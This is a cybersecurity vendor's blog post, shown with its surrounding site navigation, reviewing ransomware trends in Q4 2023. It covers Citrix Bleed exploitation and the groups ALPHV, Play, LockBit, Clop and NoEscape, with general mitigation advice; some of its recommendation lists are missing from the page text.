May 30 Webinar | SOC Talk: Automating Threat Response
Reduce Alert Noise and False Positives
Boost your team's productivity by cutting down alert noise and false positives.
Automate Security Operations
Boost efficiency, reduce burnout, and better manage risk through automation.
Dark Web Monitoring
Online protection tuned to the need of your business.
Maximize Existing Security Investments
Improve efficiencies from existing investments in security tools.
Beyond MDR
Move your security operations beyond the limitations of MDR.
Secure with Microsoft 365 E5
Boost the power of Microsoft 365 E5 security.
Secure Multi-Cloud Environments
Improve cloud security and overcome complexity across multi-cloud environments.
Secure Mergers and Acquisitions
Control cyber risk for business acquisitions and dispersed business units.
Operational Technology
Solve security operations challenges affecting critical operational technology (OT) infrastructure.
Force-Multiply Your Security Operations
Whether you’re just starting your security journey, need to up your game, or you’re not happy with an existing service, we can help you to achieve your security goals.
Detection Investigation Response
Modernize Detection, Investigation, Response with a Security Operations Platform.
Threat Hunting
Locate and eliminate lurking threats with ReliaQuest GreyMatter
Threat Intelligence
Find cyber threats that have evaded your defenses.
Model Index
Security metrics to manage and improve security operations.
Breach and Attack Simulation
GreyMatter Verify is ReliaQuest’s automated breach and attack simulation capability.
Digital Risk Protection
Continuous monitoring of open, deep, and dark web sources to identify threats.
Phishing Analyzer
GreyMatter Phishing Analyzer removes the abuse mailbox management by automating the DIR process for you.
Integration Partners
The GreyMatter cloud-native Open XDR platform integrates with a fast-growing number of market-leading technologies.
Unify and Optimize Your Security Operations
ReliaQuest GreyMatter is a security operations platform built on an open XDR architecture and designed to help security teams increase visibility, reduce complexity, and manage risk across their security tools, including on-premises, clouds, networks, and endpoints.
Blog
Company Blog
Case Studies
Brands of the world trust ReliaQuest to achieve their security goals.
Data Sheets
Learn how to achieve your security outcomes faster with ReliaQuest GreyMatter.
eBooks
The latest security trends and perspectives to help inform your security operations.
Industry Guides and Reports
The latest security research and industry reports.
Podcasts
Catch up on the latest cybersecurity podcasts, and mindset moments from our very own mental performance coaches.
Solution Briefs
A deep dive on how ReliaQuest GreyMatter addresses security challenges.
White Papers
The latest white papers focused on security operations strategy, technology & insight.
Videos
Current and future SOC trends presented by our security experts.
Events & Webinars
Explore all upcoming company events, in-person and on-demand webinars
ReliaQuest ResourceCenter
From prevention techniques to emerging security trends, our comprehensive library can arm you with the tools you need to improve your security posture.
Threat Research
Get the latest threat analysis from the ReliaQuest Threat Research Team. ReliaQuest ShadowTalk Weekly podcast featuring discussions on the latest cybersecurity news and threat research.
Shadow Talk
ReliaQuest's ShadowTalk is a weekly podcast featuring discussions on the latest cybersecurity news and threat research. ShadowTalk's hosts come from threat intelligence, threat hunting, security research, and leadership backgrounds providing practical perspectives on the week's top cybersecurity stories.
May 21, 2024
About ReliaQuest
We bring our best attitude, energy and effort to everything we do, every day, to make security possible.
Leadership
Security is a team sport.
No Show Dogs Podcast
Mental Performance Coaches Derin McMains and Dr. Nicole Detling interview world-class performers across multiple industries.
Make It Possible
Make It Possible reflects our focus on bringing cybersecurity awareness to our communities and enabling the next generation of cybersecurity professionals.
Careers
Join our world-class team.
Press and Media Coverage
ReliaQuest newsroom covering the latest press release and media coverage.
Become a Channel Partner
When you partner with ReliaQuest, you help deliver world-class cybersecurity solutions.
Contact Us
How can we help you?
A Mindset Like No Other in the Industry
Many companies tout their cultures; at ReliaQuest, we share a mindset. We focus on four values every day to make security possible: being accountable, helpful, adaptable, and focused. These values drive development of our platform, relationships with our customers and partners, and further the ReliaQuest promise of security confidence across our customers and our own teams.
In the fourth quarter of 2023 (Q4 2023), a stunning 80% more organizations were hit by ransomware attacks than in Q4 2022. It’s an alarming statistic…an emergency flare signaling the growing threat cybercriminals pose to businesses of all sizes.
November marked a significant contribution to the ransomware activity surge, at least partly because the Citrix Bleed vulnerability was heavily exploited. On top of that, November brought new aggressive extortion tactics by the ransomware group “ALPHV,” involving the US Securities and Exchange Commission (SEC) to pressure their targets.
Every problem leaves a lesson, which is why we’re about to dig deep into these developments. The light at the end of the tunnel is a clearer view of the evolving ransomware landscape, and attacker strategies.
In Q4 2023, ransomware was delivered primarily through public-facing application vulnerabilities and phishing attacks. The dramatic growth in ransomware attacks can be attributed to several factors. First, attackers had easy access to ransomware-as-a-service (RaaS) tools. They were also, almost certainly, driven by the attractive risk-reward ratio: Few attackers were caught and held accountable for cyber attacks.
Figure 1: Number of compromised entities listed on data-leak sites by month in 2023
November 2023 stood out as particularly busy, with the second-highest number of compromised entities all year. The reason is probably down to all the threat groups that jumped to exploit the Citrix Bleed vulnerability to deliver ransomware. Historically, threat groups have been zealous about newly uncovered, high-severity vulnerabilities. Citrix Bleed was especially appealing because attackers easily bypassed multifactor authentication (MFA) to hijack user sessions. That’s why it’s crucial to prioritize security patches and manage vulnerabilities effectively. During Q4, many threat actors took advantage of critical vulnerabilities to distribute ransomware.
The Q4 2023 sectoral pattern of targeting remained largely consistent with the previous quarter: Manufacturing; professional, scientific, and technical services; and construction bore the brunt of the impact. Knowing which sectors are being targeted—and in which locations—can help drive proactive security measures to best prepare for a potential attack.
The regional preference was for the United States, plus the United Kingdom and Canada. Those three countries experienced the majority of documented ransomware attacks, which stands to reason: They’re appealing because of their thriving economies, English-speaking populations, and ability to pay large sums to reinstate compromised systems. They’ve become prime targets for cybercrime groups, whose members recognize the potential to seize substantial ransom payments.
Figure 2: Number of compromised entities listed on data-leak sites by threat group in Q4 2023
The number of ransomware groups only continues to expand, and the availability of RaaS continues to attract operators with varying skill levels. So we can expect the increase in ransomware attacks that began in 2023 to persist throughout 2024. Implementing proactive security measures will be essential for organizations of all sizes.
Cyber-threat actors constantly find innovative ways to bypass the latest defensive systems. (Check out our recap of cyber-threat techniques in Q4.) They’re exploiting vulnerabilities that have not been addressed and/or targeting unsuspecting users. In the final stretch of 2023, we saw not only more attacks from certain groups, but also new tactics and techniques.
For security defenders, it’s a dynamic cat-and-mouse game, and their cybersecurity approach must stay one step ahead of threat actors’ attack strategies. Organizations and individuals should continuously update their defenses, stay vigilant, and place ongoing education and awareness at the forefront, to counter the evolving and increasingly aggressive cyber threats. We’ve come up with some specific mitigation recommendations, based on Q4 threats that seem determined to not fade away:
The ransomware group ALPHV (aka “BlackCat”) adding an extra layer of aggression to their Q4 extortion tactics: The notorious group used SEC reporting measures against their targets after an attack, for an extra layer of extra intimidation and pressure to meet their demands. The hyper-aggression is in response to a growing resistance to paying ransom demands. Involving the SEC (or other regulatory bodies) intensifies consequences and public scrutiny for compromised entities.
ALPHV’s new tactic emphasizes the need for heightened cybersecurity measures, and preparedness for other new or evolving tactics. Security teams would also benefit from performing ongoing reviews and updates of policies, to better respond to aggressive ransomware tactics.
Also, because ALPHV is known to gain initial access to organizations through social engineering and moving laterally in a network via remote desktop protocol (RDP), we recommend:
Figure 3: Screenshot of ALPHV’s post reporting an organization to the SEC
In Q4, we saw a significant increase in the number compromised entities listed by the ransomware group “Play” (aka Playcrypt). The group tends to gain initial access by exploiting known public-facing vulnerabilities, such as in FortiOS, practices double-extortion, and observes a discreet-but-proactive approach in attacks: Instead of providing direct payment instructions in ransom notes, they instruct victims to contact them via email.
Requesting payment in cryptocurrency, Play members specify wallet addresses where the ransom should be sent. If a target doesn’t play ball, the group escalates the situation by threatening to publicly disclose the exfiltrated data on their designated leak site.
Play likes to exploit flaws in public-facing applications to gain initial access, and exploits highly privileged administrator accounts; with that in mind, we recommend:
Following the fall of “NoEscape” and ALPHV’s temporary outage, the “LockBit” group saw a chance to recruit members from those notorious ransomware operations. LockBitSupp, the group’s public representative, offered affiliates the use of LockBit’s data-leak site and negotiation panel. It’s unclear whether the recruitment scheme worked, but at least one organization whose compromise was linked to ALPHV ended up being named on LockBit’s leak site.
One thing that is clear: LockBit—the most active group throughout 2023—is firmly determined to not only maintain but enhance operations. By expanding membership, LockBit would increase operational capacity, which means the group has no intention of slowing down or pausing activities. Individuals and organizations should remain vigilant and fortify their cybersecurity defenses in light of the innovation and determination LockBit is showing.
LockBit and affiliates have been seen moving laterally through the systems of familiar tools, such as Windows PowerShell and server message block (SMB), so we recommend:
The 2023 boost in the number of ransomware victims is a trend that looks set to continue. Here’s what we’re also anticipating:
LockBit has been exploiting vulnerabilities in NetScaler, a widely used networking technology, to target high-value organizations (banks, governments, law firms, etc). That focus suggests LockBit aims to maximize its impact and associated potential for large ransom payments; such organizations often possess sensitive (read: valuable) data. Given the profitability and success of these attacks, LockBit will probably continue its NetScaler exploitation and industry focus. To mitigate the risk, organizations should patch and update their NetScaler applications.
In case you’re a complete stranger to cyber threat intelligence, “Clop” is a group is known for its large-scale ransomware attacks, managed file transfer (MFT) vulnerability exploits, and zero-day exploitation. To say the group has been prolific is an understatement. But following a spate attacks of its MOVEit campaign in mid-September 2023, Clop’s activity tapered off; the group named 95.3% fewer victims in Q4 2023 than in the previous quarter.
This tapering after an activity surge has been seen with Clop before, following a 2020–21 campaign that abused several zero-days. In other words, Clop could very well make a comeback. To guard against similar campaigns, organizations should minimize exposure on MFT sites by limiting content storage duration to about 5 or 10 business days—after all, these services are primarily intended for file transfers rather than long-term storage.
Within just seven months, the NoEscape group listed 145 compromised organizations on its data-leak site. In Q4 2023, the group named 24.6% more compromised entities than in the previous quarter. But, all stats aside, NoEscape hasn’t reported any newly compromised entities since December 4, 2023.
Affiliates of NoEscape allege that the group conducted an exit scam that allegedly led to ransom payments worth millions of dollars. The group took down their data-leak site and has lost the trust of affiliates. But again, it’s reasonable to anticipate another iteration of the group at some point, based on the fact that NoEscape emerged as a rebrand of “Avaddon,” and given its success with multi-extortion tactics.
NoEscape affiliates are known to deliver the ransomware through various means, but the most prominent is malicious file downloads and infected email attachments. Organizations should regularly update antivirus software and conduct security awareness training for employees.
Interested in learning more about the cyber-threat landscape in 2024? Our Cyber-threat Predictions blog offers a comprehensive analysis of various topics, including the risks associated with the abuse of artificial intelligence, the potential impacts of geopolitical tension, evolving trends in initial access and ransomware, and best practices for preparing against a wide range of cyber threats.
Get a live demo of our security operations platform, GreyMatter, and learn how you can improve visibility, reduce complexity, and manage risk in your organization.